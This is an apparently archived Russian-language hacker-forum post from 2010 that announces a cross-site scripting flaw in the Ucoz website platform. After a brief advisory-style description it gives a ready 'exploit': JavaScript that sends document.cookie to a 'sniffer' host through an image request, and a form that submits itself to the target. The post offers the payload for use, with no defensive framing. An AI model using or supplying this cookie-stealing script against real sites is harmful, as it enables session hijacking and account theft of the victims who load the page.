Межсайтовый скриптинг в Ucoz

Discussion in 'Веб-уязвимости' started by %R00tKit%, 26 Aug 2010.

Thread Status:
Not open for further replies.
  1. %R00tKit%

    %R00tKit% New Member

    Joined:
    25 Aug 2010
    Messages:
    3
    Likes Received:
    2
    Reputations:
    0
    Программа: Ucoz

    Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему.
    Уязвимость существует из-за недостаточной обработки входных данных при обработке HTTP запросов.
    Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

    Эксплоит:
    Code:
    <form action="http://host/" method="post" name="main" ></form>
    <script>img = new Image(); img.src = "http://sniffer/images/s.gif?"+document.cookie;</script>
    <script>
    document.main.submit();
    </script>
    ____________________________________
    (C) %R00tKit% специально для Античата
     
Thread Status:
Not open for further replies.